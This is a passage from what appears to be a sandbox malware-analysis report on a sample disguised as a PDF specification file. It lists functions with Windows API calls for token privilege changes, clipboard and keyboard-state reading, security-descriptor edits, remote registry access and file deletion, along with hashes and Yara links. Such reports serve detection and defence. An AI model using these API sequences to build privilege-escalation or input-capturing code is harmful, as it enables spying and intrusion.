                                      • Instruction ID: 75c41288045e8dae93a67328ab7b9054cdae322fec5a2fd96350fd2e7a3ffe29
                                      • Opcode Fuzzy Hash: f1d6193d5d3c0441805c0b0dd19f4ca616d91dd1951045c02b1997f879af7722
                                      • Instruction Fuzzy Hash: 40318771A403287BEB225F659C49FBF7E6CEB84B54F114025FB05EA1D0D6B16D10EBA0
                                      Function 0037ACC5 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 223COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0037B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0037B180
                                        • Part of subcall function 0037B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0037B1AD
                                        • Part of subcall function 0037B134: GetLastError.KERNEL32 ref: 0037B1BA
                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0037AD5A
                                      • CloseHandle.KERNEL32(?), ref: 0037AD6B
                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0037AD82
                                      • GetProcessWindowStation.USER32 ref: 0037AD9B
                                      • SetProcessWindowStation.USER32(00000000), ref: 0037ADA5
                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0037ADBF
                                        • Part of subcall function 0037AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0037ACC0), ref: 0037AB99
                                        • Part of subcall function 0037AB84: CloseHandle.KERNEL32(?,?,0037ACC0), ref: 0037ABAB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue
                                      • String ID: $H*?$default$winsta0
                                      • API String ID: 3576815822-2897388558
                                      • Opcode ID: 98c6487df4f8adfdc6f498371cda062ce414527ff82342d364ff0cd1284a60fd
                                      • Instruction ID: 2f81ed0590f76539943918e0a34b078f637e1544a8293ab659d2183c87ced6c1
                                      • Opcode Fuzzy Hash: 98c6487df4f8adfdc6f498371cda062ce414527ff82342d364ff0cd1284a60fd
                                      • Instruction Fuzzy Hash: 9D819E71800209EFDF239FA4CC45EEEBB78EF48344F058129F918A6561D7399E54DB62
                                      Function 00396B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenClipboard.USER32(003DDC00), ref: 00396B36
                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00396B44
                                      • GetClipboardData.USER32(0000000D), ref: 00396B4C
                                      • CloseClipboard.USER32 ref: 00396B58
                                      • GlobalLock.KERNEL32(00000000), ref: 00396B74
                                      • CloseClipboard.USER32 ref: 00396B7E
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00396B93
                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00396BA0
                                      • GetClipboardData.USER32(00000001), ref: 00396BA8
                                      • GlobalLock.KERNEL32(00000000), ref: 00396BB5
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00396BE9
                                      • CloseClipboard.USER32 ref: 00396CF6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                      • String ID:
                                      • API String ID: 3222323430-0
                                      • Opcode ID: ab5ee39a1c3f711a61c331987ed9ea34d1e00030563166066629c34ca9311b78
                                      • Instruction ID: 06667a683c48bb94a1c55175f898984522ff46fa87ce709e1ba8d4f1a1f81ab5
                                      • Opcode Fuzzy Hash: ab5ee39a1c3f711a61c331987ed9ea34d1e00030563166066629c34ca9311b78
                                      • Instruction Fuzzy Hash: FA51AC31205201ABD703AF65DD96F6E77ACEF84B00F010429F696DA2E1EF70E905CB62
                                      Function 00373920 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 168libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNEL32(USER32.DLL,00000000,00000800,?,?,?,?,?,00368364,004002E0,Microsoft Visual C++ Runtime Library,00012010), ref: 0037396E
                                      • GetLastError.KERNEL32(?,?,?,?,?,00368364,004002E0,Microsoft Visual C++ Runtime Library,00012010), ref: 0037397A
                                      • LoadLibraryW.KERNEL32(USER32.DLL,?,?,?,?,?,00368364,004002E0,Microsoft Visual C++ Runtime Library,00012010), ref: 0037398E
                                      • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 003739A4
                                      • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 003739C0
                                      • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 003739D4
                                      • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 003739E8
                                      • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00373A00
                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00368364,004002E0,Microsoft Visual C++ Runtime Library,00012010), ref: 00373A11
                                      • OutputDebugStringW.KERNEL32(?,?,?,?,?,?,00368364,004002E0,Microsoft Visual C++ Runtime Library,00012010), ref: 00373A23
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad$DebugDebuggerErrorLastOutputPresentString
                                      • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                      • API String ID: 3193981680-564504941
                                      • Opcode ID: 4d7d7afa5918954f9754d6e2555e689d9289de2b4d2626cb6b7d97608573887b
                                      • Instruction ID: 8319a64cbb6aa361734fee4ff92dc5c7e60326d937140b15f7d00682fd260516
                                      • Opcode Fuzzy Hash: 4d7d7afa5918954f9754d6e2555e689d9289de2b4d2626cb6b7d97608573887b
                                      • Instruction Fuzzy Hash: C051C371A00246EBCB63DFB59D86EAE77A8BF04740B158429F54AF3160DB38DE40DB64
                                      Function 003860DD Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 174filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00386EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00385FA6,?), ref: 00386ED8
                                        • Part of subcall function 00386EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00385FA6,?), ref: 00386EF1
                                        • Part of subcall function 003872CB: GetFileAttributesW.KERNEL32(?,00386019), ref: 003872CC
                                      • FindFirstFileW.KERNEL32(?,?), ref: 003861A4
                                      • lstrcmpiW.KERNEL32(?,?), ref: 0038625D
                                      • DeleteFileW.KERNEL32(?), ref: 0038626E
                                      • MoveFileW.KERNEL32(?,?), ref: 00386289
                                      • MoveFileW.KERNEL32(?,?), ref: 00386298
                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 003862AD
                                      • DeleteFileW.KERNEL32(?), ref: 003862BE
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 003862E1
                                      • FindClose.KERNEL32(00000000), ref: 003862FD
                                      • FindClose.KERNEL32(00000000), ref: 0038630B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: File$Find$CloseDeleteFullMoveNamePath$AttributesCopyFirstNextlstrcmpi
                                      • String ID: \*.*$p1Kw`KLw
                                      • API String ID: 2804892958-1688704836
                                      • Opcode ID: 892f8feb5541cda8dcaafecf56ceab97175285183cb7c6de6a174defa4b08d2b
                                      • Instruction ID: b43a3e75efc78c7ab9368541ace232fa5474c8cc1aa914c931402a74ca30b203
                                      • Opcode Fuzzy Hash: 892f8feb5541cda8dcaafecf56ceab97175285183cb7c6de6a174defa4b08d2b
                                      • Instruction Fuzzy Hash: 7C51227280821C6ACB22FB91DC46DEF77BCAF05300F0945EAE585E7141DE76A7498FA4
                                      Function 00346F07 Relevance: 22.1, Strings: 17, Instructions: 883COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: >$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$T.?$UCP)$UTF)$UTF16)$>>> >
                                      • API String ID: 0-711257144
                                      • Opcode ID: 0ed47925fadd9e57dff83c3c504fb9e9537a298f616a2d5320fde6a8d33a4982
                                      • Instruction ID: 65d22b3bfe05532eb623a4eeef9bfbd0f57ed2b5cb6334f4b006f9dc0a0fdb26
                                      • Opcode Fuzzy Hash: 0ed47925fadd9e57dff83c3c504fb9e9537a298f616a2d5320fde6a8d33a4982
                                      • Instruction Fuzzy Hash: 6C728E75E042199BDB26DF59C880BBEB7F5BF08310F15816AE905EB680DB709E41DB90
                                      Function 00391B2F Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,774A8FB0,?,00000000), ref: 00391B50
                                      • GetFileAttributesW.KERNEL32(?), ref: 00391B8E
                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00391BA8
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00391BC0
                                      • FindClose.KERNEL32(00000000), ref: 00391BCB
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00391BE7
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00391C37
                                      • SetCurrentDirectoryW.KERNEL32(003F39FC), ref: 00391C55
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00391C5F
                                      • FindClose.KERNEL32(00000000), ref: 00391C6C
                                      • FindClose.KERNEL32(00000000), ref: 00391C7C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                      • String ID: *.*
                                      • API String ID: 1409584000-438819550
                                      • Opcode ID: 3e02f061eba18493177d0a6af5e8b49c96fd8d0d4a6f9378eee7b911718332c4
                                      • Instruction ID: 4553d73e19d503c10d574b26e8584c90484f702f1e56bbdb2301ae52bff8018c
                                      • Opcode Fuzzy Hash: 3e02f061eba18493177d0a6af5e8b49c96fd8d0d4a6f9378eee7b911718332c4
                                      • Instruction Fuzzy Hash: 6F31C23254021A6BDF23EBB4EC49EEE77AC9F05320F1545A6F915E3090EB70EA458F64
                                      Function 0037A66C Relevance: 19.7, APIs: 13, Instructions: 178memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0037ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0037ABD7
                                        • Part of subcall function 0037ABBB: GetLastError.KERNEL32(?,0037A69F,?,?,?), ref: 0037ABE1
                                        • Part of subcall function 0037ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0037A69F,?,?,?), ref: 0037ABF0
                                        • Part of subcall function 0037ABBB: HeapAlloc.KERNEL32(00000000,?,0037A69F,?,?,?), ref: 0037ABF7
                                        • Part of subcall function 0037ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0037AC0E
                                        • Part of subcall function 0037AC56: GetProcessHeap.KERNEL32(00000008,0037A6B5,00000000,00000000,?,0037A6B5,?), ref: 0037AC62
                                        • Part of subcall function 0037AC56: HeapAlloc.KERNEL32(00000000,?,0037A6B5,?), ref: 0037AC69
                                        • Part of subcall function 0037AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0037A6B5,?), ref: 0037AC7A
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0037A6D0
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0037A704
                                      • GetLengthSid.ADVAPI32(?), ref: 0037A715
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 0037A752
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0037A76E
                                      • GetLengthSid.ADVAPI32(?), ref: 0037A78B
                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0037A79A
                                      • HeapAlloc.KERNEL32(00000000), ref: 0037A7A1
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0037A7C2
                                      • CopySid.ADVAPI32(00000000), ref: 0037A7C9
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0037A7FA
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0037A820
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0037A834
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast
                                      • String ID:
                                      • API String ID: 1795222879-0
                                      • Opcode ID: 823baeb521bb0f17bd6d1436cc42f925c8b7ca89a84eb19d87e817d09480e59c
                                      • Instruction ID: f4565c250fee65eb59b4dced8966e516732aa2b738f373c833bd95351dd69d8b
                                      • Opcode Fuzzy Hash: 823baeb521bb0f17bd6d1436cc42f925c8b7ca89a84eb19d87e817d09480e59c
                                      • Instruction Fuzzy Hash: B7513C71900619BBDF169F95DC45EEEBBB9FF44300F048129F915EA290D738AA05CB61
                                      Function 00391C8A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,774A8FB0,?,00000000), ref: 00391CAB
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00391D06
                                      • FindClose.KERNEL32(00000000), ref: 00391D11
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00391D2D
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00391D7D
                                      • SetCurrentDirectoryW.KERNEL32(003F39FC), ref: 00391D9B
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00391DA5
                                      • FindClose.KERNEL32(00000000), ref: 00391DB2
                                      • FindClose.KERNEL32(00000000), ref: 00391DC2
                                        • Part of subcall function 00386BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00386BEF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                      • String ID: *.*
                                      • API String ID: 2640511053-438819550
                                      • Opcode ID: 7ee6044281470cda1de8bf2fa672967b2536fa43cf7f2bf475e7f77f2b442a50
                                      • Instruction ID: 1b7d5a0bf39d7d410613f7bd01548c796c2e29c260efdcf815f922e0c42d9e09
                                      • Opcode Fuzzy Hash: 7ee6044281470cda1de8bf2fa672967b2536fa43cf7f2bf475e7f77f2b442a50
                                      • Instruction Fuzzy Hash: A631FE3250061B6ADF23EBA0EC09EEE77AC9F05324F1545A5F901F61A1DB70EE458B64
                                      Function 003A31BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 003A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003A2BB5,?,?), ref: 003A3C1D
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003A328E
                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 003A332D
                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003A33C5
                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 003A3604
                                      • RegCloseKey.ADVAPI32(00000000), ref: 003A3611
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper
                                      • String ID:
                                      • API String ID: 1724414362-0
                                      • Opcode ID: 152fb3a6ec6cca40eee6daf851676b26cf445f0c1cd955b0d294339bbd6db965
                                      • Instruction ID: f1742b151c68882365903674b71f479ecd86167d1fec31b87f114ec56722d15d
                                      • Opcode Fuzzy Hash: 152fb3a6ec6cca40eee6daf851676b26cf445f0c1cd955b0d294339bbd6db965
                                      • Instruction Fuzzy Hash: 5BE15D75604210AFCB16DF29C995E6ABBE8FF8A710F04886DF44ADB261DB30ED05CB51
                                      Function 00382B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 00382B5F
                                      • GetAsyncKeyState.USER32(000000A0), ref: 00382BE0
                                      • GetKeyState.USER32(000000A0), ref: 00382BFB
                                      • GetAsyncKeyState.USER32(000000A1), ref: 00382C15
                                      • GetKeyState.USER32(000000A1), ref: 00382C2A
                                      • GetAsyncKeyState.USER32(00000011), ref: 00382C42
                                      • GetKeyState.USER32(00000011), ref: 00382C54
                                      • GetAsyncKeyState.USER32(00000012), ref: 00382C6C
                                      • GetKeyState.USER32(00000012), ref: 00382C7E
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00382C96
                                      • GetKeyState.USER32(0000005B), ref: 00382CA8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      • Opcode ID: df7222d00df68b77efc74008eddebe1d8e23797595a2ce3998684e0a40548693
                                      • Instruction ID: 532c199b9bfda272fb8d3c580714ed1951ced2e72e30aad6fbb31ce2b21ec0d7
                                      • Opcode Fuzzy Hash: df7222d00df68b77efc74008eddebe1d8e23797595a2ce3998684e0a40548693
                                      • Instruction Fuzzy Hash: E841B2345047C96DFF37BB6489047BBBEB06F12344F0580D9E9C6562C2EBA499C8C7A2
                                      Function 0038F5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 278timefileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0038F62B
                                      • FindClose.KERNEL32(00000000), ref: 0038F67F
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0038F6A4
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0038F6BB
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0038F6E2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: FileTime$FindLocal$CloseFirstSystem
                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                      • API String ID: 3238362701-2428617273
                                      • Opcode ID: 25ab6d3c59b022954b93a7869f7bf3cf23b685ac66e49afe79c4c990ec97ee22
                                      • Instruction ID: 742999cb9fa96a2c57aba02c127b0606c104cc507fc28823e6873e47d5e2298b
                                      • Opcode Fuzzy Hash: 25ab6d3c59b022954b93a7869f7bf3cf23b685ac66e49afe79c4c990ec97ee22
                                      • Instruction Fuzzy Hash: 8FA110B2408344ABC352EB94C885DAFB7ECAF98705F444D2EF585CA152EB34E949C762
                                      Function 0039091D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 185timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLocalTime.KERNEL32(?), ref: 003909DF
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 003909EF
                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003909FB
                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00390A98
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00390AAC
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00390ADE
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00390AFF
                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00390B4A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CurrentDirectoryTime$File$Local$System
                                      • String ID: *.*
                                      • API String ID: 1464919966-438819550
                                      • Opcode ID: 7553b180d67da6ea4086656c7127005218c591f5bbfdae75ef020e9ba8afed49
                                      • Instruction ID: 0d099e1c82a6cd5f16f2fa7d7ce258d3c366e6be426a284a2e8f20e7ba31b93e
